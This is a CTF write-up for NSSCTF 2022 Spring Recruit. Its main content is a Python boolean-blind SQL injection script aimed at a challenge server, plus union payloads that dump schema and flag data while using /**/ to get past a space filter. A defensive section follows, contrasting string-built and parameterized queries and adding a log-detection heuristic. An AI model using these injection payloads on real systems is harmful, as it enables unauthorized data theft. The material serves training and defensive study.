NSSCTF 2022 Spring Recruit

ezgame

Found the flag directly in the JS.

babyphp

Trivial.

babysql

First, dump the database name character by character (boolean-based blind; the form rejects spaces, so /**/ stands in for whitespace):

import requests

url = "http://1.14.71.254:28430"

# One character of the database name is tested per request; the response text
# is the oracle (the "dead end" message means the condition was false).
payload = "flag'/**/or/**/substr(database(),%d,1)='%c"

charset = "abcdefghijklmnopqrstuvwxyz-{}0123456789"

result = ""

for i in range(1, 10):
    for k in charset:
        data = {
            'username': payload % (i, k)
        }
        res = requests.post(url, data=data)
        if "竟然是死胡同(沮丧)" not in res.text:
            result += k
            break
    # progress after each position
    print(result)

print(result)

Later I realised that select was not filtered... after that it was very simple.

Then dump the table names:

username=0'/**/union/**/select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='test

Then the column names:

username=0'/**/union/**/select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag

Then get the flag:

username=0'/**/union/**/select/**/group_concat(flag)/**/from/**/flag/**/where/**/1='1
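The root cause behind all three steps is the same: the login query is assembled from the username string, so a quote closes the literal and the rest of the input becomes SQL, and the space blocklist changes nothing because /**/ is whitespace to the parser. The following is an added example (not code from the writeup or the challenge) that reproduces that query shape against a constructed in-memory SQLite schema with a placeholder flag, runs the writeup's two injection shapes (boolean oracle and union) through both the string-built query and a parameterized one, and adds a small log-review heuristic that normalises comment-as-whitespace before matching. The payloads are adapted for SQLite (its own flag table in place of database(), and '1'='1' instead of 1='1', which SQLite compares as different types); the schema, table contents and helper names are assumptions.

```python
import re
import sqlite3

# Constructed schema mirroring the layout the writeup uncovered: a users table
# behind the login form and a separate flag table. The flag is a placeholder.
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 'not-the-point');
CREATE TABLE flag (flag TEXT);
INSERT INTO flag VALUES ('NSSCTF{constructed_placeholder}');
"""


def _connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(username):
    """Query built by string formatting, the shape the challenge evidently used.
    Returns the first column of every row the query produced; an empty list is
    the 'dead end' response the blind script keyed on."""
    conn = _connect()
    query = "SELECT username FROM users WHERE username='%s'" % username
    rows = conn.execute(query).fetchall()
    conn.close()
    return [r[0] for r in rows]


def lookup_safe(username):
    """Same lookup with a bound parameter: the input is always data, never SQL."""
    conn = _connect()
    rows = conn.execute(
        "SELECT username FROM users WHERE username=?", (username,)
    ).fetchall()
    conn.close()
    return [r[0] for r in rows]


def looks_injected(value):
    """Log-review heuristic (assumed, not from the page): collapse C-style
    comments to a space first, so /**/ cannot hide the keywords from the
    match the way it hid them from the challenge's space filter."""
    normalized = re.sub(r"/\*.*?\*/", " ", value).lower()
    return bool(re.search(r"'\s*(or|union)\s", normalized))


# Boolean oracle, adapted from the writeup's database() probe to the flag table.
BLIND_TRUE = "flag'/**/or/**/substr((select/**/flag/**/from/**/flag),1,1)='N"
BLIND_FALSE = "flag'/**/or/**/substr((select/**/flag/**/from/**/flag),1,1)='X"
# Union extraction, adapted from the writeup's final payload for SQLite typing.
UNION_PAYLOAD = "0'/**/union/**/select/**/group_concat(flag)/**/from/**/flag/**/where/**/'1'='1"

if __name__ == "__main__":
    for label, value in [("blind true", BLIND_TRUE), ("blind false", BLIND_FALSE),
                         ("union", UNION_PAYLOAD), ("plain", "admin")]:
        print(label, "| string-built:", lookup_vulnerable(value),
              "| parameterized:", lookup_safe(value),
              "| flagged:", looks_injected(value))
```

With the string-built query the oracle payload returns the admin row when its guess is right and nothing when it is wrong, and the union payload returns the flag table's contents; with the bound parameter every injected value simply matches no user. The heuristic is only for triage of request logs; parameterization is the fix.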

Fairly standard.


Leave the noise behind and go find life's treasures.